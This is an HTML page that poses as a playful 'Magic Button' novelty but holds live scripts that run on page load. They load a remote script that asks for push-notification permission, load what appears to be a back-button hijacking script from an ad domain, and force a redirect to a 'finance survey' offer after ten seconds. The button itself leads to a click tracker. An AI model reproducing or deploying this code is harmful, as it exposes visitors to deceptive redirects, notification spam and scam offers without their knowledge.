<!DOCTYPE html>
<html lang="en">
  <head>
    <script>
    var s = document.createElement('script');
    s.src='//beevakum.net/pfe/current/micro.tag.min.js?z=7292539'+'&sw=/sw-check-permissions-937b5.js';
    s.onload = function(result) {
        switch (result) {
            case 'onPermissionDefault':
            window.location.replace("//inumbreonr.com/4/7292645");break;
            case 'onPermissionAllowed':break;
            case 'onPermissionDenied':break;
            case 'onAlreadySubscribed':
            window.location.replace("//inumbreonr.com/4/7292645");break;
            case 'onNotificationUnsupported':break;
        }
    };
    document.head.appendChild(s);
</script>
    <script>
    var back = 'https://berebereuolakola.com/link?z=7292773&var={SOURCE_ID}&ymid={CLICK_ID}';
    var under = 'https://pterekro.com/link?z=7319506&var={SOURCE_ID}&ymid={CLICK_ID}';
</script>
<script src="https://backunder.com/script.js"></script>
    <script>
var count = 10;
var counter = setInterval(timer, 1000);

function timer() {
    count = count - 1;
    if (count <= 0) {
        clearInterval(counter);
        window.location = 'https://psajekauhap.com/finance-survey.html?z=7319494&offer_id=9540&var={SOURCE_ID}&ymid={CLICK_ID}'
        return;
    }
}
</script>


    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta name="referrer" content="no-referrer" />
    <meta name="viewport" content="initial-scale=1,maximum-scale=1,user-scalable=no" />
    <style>
      body {
        background-color: #243651;
        text-align: center !important;
      }
      .top {
        color: #ff8000;
        font-size: 54px;
        font-weight: bold;
      }
      .center {
        color: #fff;
        margin-top: 25px;
        font-size: 24px;
        font-weight: bold;
      }
      .bottom-btn {
        background-color: #ff8000;
        border: 0;
        width: 240px;
        height: 40px;
        color: #fff;
        margin-top: 30px;
        font-size: 24px;
        font-weight: bold;
      }
      .bottom-txt {
        color: #d8d8d8;
        margin-top: 5px;
        font-size: 12px;
        font-weight: bold;
      }
    </style>
    <title>Magic Button</title>
  </head>
  <body>
    <div class="top">Magic Button</div>
    <div class="center">Will you click or not? 😜</div>
    <button class="bottom-btn" id="cta">Make Magic!</button>
    <div class="bottom-txt">Click this button to make magic</div>
    <script>
      window.addEventListener('DOMContentLoaded', () => {
        document.querySelector('#cta').addEventListener('click', function () {
          window.onbeforeunload = null;
          window.location = 'https://mesik.bemobtrk.com/click';
        });
      });
    </script>
  </body>
</html>
